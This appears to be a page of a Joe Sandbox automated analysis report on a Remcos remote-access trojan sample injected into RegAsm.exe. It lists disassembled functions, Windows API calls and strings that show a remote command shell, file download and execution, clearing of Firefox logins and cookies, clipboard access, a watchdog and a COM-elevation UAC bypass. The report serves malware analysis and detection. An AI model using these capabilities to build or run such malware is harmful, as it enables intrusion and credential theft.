                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                  • Opcode ID: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                                                                                                  • Instruction ID: 079a7b638a28e99b338f4493b6ebfa8105bff269478f0661155a893ef6bf0f7e
                                                                                                                                  • Opcode Fuzzy Hash: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                                                                                                  • Instruction Fuzzy Hash: 13B00872418382EBCF02DF90DD0492ABAB2BB88741F184C5CB2A14107187228428EB06

                                                                                                                                  Non-executed Functions

                                                                                                                                  Function 00407CD2 Relevance: 44.6, APIs: 10, Strings: 15, Instructions: 835filesleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                                                                                                                  • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                                                                                                                  • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                                                                                                                    • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                                                                                                    • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                                                                                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                                                                                                    • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                                                                                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                    • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                                                                    • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                                                                                                                  • GetLogicalDriveStringsA.KERNEL32 ref: 004082B3
                                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0040868D
                                                                                                                                    • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                                                                                                                    • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                                                                                    • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                                                                                    • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                                                                                  • Sleep.KERNEL32(000007D0), ref: 00408733
                                                                                                                                  • StrToIntA.SHLWAPI(00000000), ref: 00408775
                                                                                                                                    • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                                                                                  • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                                                                                                  • API String ID: 1067849700-181434739
                                                                                                                                  • Opcode ID: 8f9230baec0eb1e52dbeff348466e26c4dcfe8dee4ab33f0bd5d19348bcac538
                                                                                                                                  • Instruction ID: f533dcafa702064eae222fc9ff54aa9327b172b3479e3db69e1c842a3252ef64
                                                                                                                                  • Opcode Fuzzy Hash: 8f9230baec0eb1e52dbeff348466e26c4dcfe8dee4ab33f0bd5d19348bcac538
                                                                                                                                  • Instruction Fuzzy Hash: F04293716043016BC604FB76C9579AE77A9AF91348F80483FF542671E2EF7C9908879B
                                                                                                                                  Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 004056E6
                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 00405723
                                                                                                                                  • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                                                                                                                                  • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                                                                                                  • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                                                                                                  • PeekNamedPipe.KERNEL32 ref: 004058BC
                                                                                                                                  • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                                                                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                                                  • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
                                                                                                                                  • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                                                                                                  • CloseHandle.KERNEL32 ref: 00405A23
                                                                                                                                  • CloseHandle.KERNEL32 ref: 00405A2B
                                                                                                                                  • CloseHandle.KERNEL32 ref: 00405A3D
                                                                                                                                  • CloseHandle.KERNEL32 ref: 00405A45
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                                                  • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                                                                                                  • API String ID: 2994406822-18413064
                                                                                                                                  • Opcode ID: 3bf44ab92ff2caae0b3eb6e784b73306b892efe8c499cead9e04a1f7096e9acc
                                                                                                                                  • Instruction ID: feb7c3e087fbbfe745e3798ef664df189eb35a760580a6c3fca7c2e5343dee52
                                                                                                                                  • Opcode Fuzzy Hash: 3bf44ab92ff2caae0b3eb6e784b73306b892efe8c499cead9e04a1f7096e9acc
                                                                                                                                  • Instruction Fuzzy Hash: 1A91C271604604AFD711FB36ED42A6B369AEB84308F01443FF589A62E2DB7D9C448F6D
                                                                                                                                  Function 00412132 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00412141
                                                                                                                                    • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                                                                    • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                                                                                                    • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4), ref: 004138E6
                                                                                                                                  • OpenMutexA.KERNEL32 ref: 00412181
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00412190
                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                                                                                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                                                                                  • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                                                                                                  • API String ID: 3018269243-13974260
                                                                                                                                  • Opcode ID: 2205b3d103f08f6d55fa3a4c0d872f48598f397e46eb09d3558a5a12db7084c4
                                                                                                                                  • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                                                                                                                                  • Opcode Fuzzy Hash: 2205b3d103f08f6d55fa3a4c0d872f48598f397e46eb09d3558a5a12db7084c4
                                                                                                                                  • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                                                                                                                                  Function 0040BB6B Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040BC04
                                                                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$CloseFile$FirstNext
                                                                                                                                  • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                                                  • API String ID: 1164774033-3681987949
                                                                                                                                  • Opcode ID: ddf3ae28b5732d4bdf30ea22351dc37fdb7451648e085e9b91ca2b4f61ea912e
                                                                                                                                  • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                                                                                                                  • Opcode Fuzzy Hash: ddf3ae28b5732d4bdf30ea22351dc37fdb7451648e085e9b91ca2b4f61ea912e
                                                                                                                                  • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                                                                                                                  Function 004168FC Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • OpenClipboard.USER32 ref: 004168FD
                                                                                                                                  • EmptyClipboard.USER32 ref: 0041690B
                                                                                                                                  • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00416934
                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                                                                                                                  • CloseClipboard.USER32 ref: 00416990
                                                                                                                                  • OpenClipboard.USER32 ref: 00416997
                                                                                                                                  • GetClipboardData.USER32 ref: 004169A7
                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                                                                                  • CloseClipboard.USER32 ref: 004169BF
                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                                                  • String ID: !D@
                                                                                                                                  • API String ID: 3520204547-604454484
                                                                                                                                  • Opcode ID: bf5a65ac99ffe61d9797845c90f3a5bbf17482b58dee495671916681c2117e8d
                                                                                                                                  • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                                                                                                                                  • Opcode Fuzzy Hash: bf5a65ac99ffe61d9797845c90f3a5bbf17482b58dee495671916681c2117e8d
                                                                                                                                  • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                                                                                                                  Function 0040F4AF Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 210processCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,8)3,?,P2), ref: 0040F4C9
                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4F4
                                                                                                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040F59E
                                                                                                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040F6A9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                                                                                                  • String ID: 8)3$C:\Program Files(x86)\Internet Explorer\$Inj$P2$ieinstal.exe$ielowutil.exe
                                                                                                                                  • API String ID: 3756808967-4096080296
                                                                                                                                  • Opcode ID: 4c1678c020118b3bcda45d43f08c867fc8f180d6921f39041d9cab00d7c74641
                                                                                                                                  • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                                                                                                                                  • Opcode Fuzzy Hash: 4c1678c020118b3bcda45d43f08c867fc8f180d6921f39041d9cab00d7c74641
                                                                                                                                  • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                                                                                                                  Function 0040BD72 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040BE04
                                                                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$Close$File$FirstNext
                                                                                                                                  • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                  • API String ID: 3527384056-432212279
                                                                                                                                  • Opcode ID: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                                                                                                                                  • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                                                                                                                  • Opcode Fuzzy Hash: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                                                                                                                                  • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                                                                                                                  Function 0041330D Relevance: 18.2, APIs: 12, Instructions: 153fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                                                                                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                                                                                                                  • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                                                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004134A0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 297527592-0
                                                                                                                                  • Opcode ID: f8cfc853885fc8b29f950af92ed283b35790545d66a1b0f015cadf1906342396
                                                                                                                                  • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
                                                                                                                                  • Opcode Fuzzy Hash: f8cfc853885fc8b29f950af92ed283b35790545d66a1b0f015cadf1906342396
                                                                                                                                  • Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                                                                                                                  Function 00419662 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 0$1$2$3$4$5$6$7$VG
                                                                                                                                  • API String ID: 0-1861860590
                                                                                                                                  • Opcode ID: 2b7f1c5f9e74514b744c6683ac33cf56b6b25cbe789a3e3722b220038b1ce3bf
                                                                                                                                  • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                                                                                                                                  • Opcode Fuzzy Hash: 2b7f1c5f9e74514b744c6683ac33cf56b6b25cbe789a3e3722b220038b1ce3bf
                                                                                                                                  • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                                                                                                                  Function 00407538 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _wcslen.LIBCMT ref: 0040755C
                                                                                                                                  • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Object_wcslen
                                                                                                                                  • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                                                  • API String ID: 240030777-3166923314
                                                                                                                                  • Opcode ID: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                                                                                                  • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                                                                                                                  • Opcode Fuzzy Hash: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                                                                                                  • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                                                                                                                                  Function 0041A7D9 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                                                                                                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                                                                                                                  • GetLastError.KERNEL32 ref: 0041A84C
                                                                                                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3587775597-0
                                                                                                                                  • Opcode ID: 43b67a718bb517ffd93a938c9ebe81ee5828789c1c870c485cfbeb08b180e584
                                                                                                                                  • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                                                                                                                  • Opcode Fuzzy Hash: 43b67a718bb517ffd93a938c9ebe81ee5828789c1c870c485cfbeb08b180e584
                                                                                                                                  • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                                                                                                                  Function 00452690 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                  • String ID: JD$JD$JD
                                                                                                                                  • API String ID: 745075371-3517165026
                                                                                                                                  • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                                                                                  • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                                                                                                                  • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
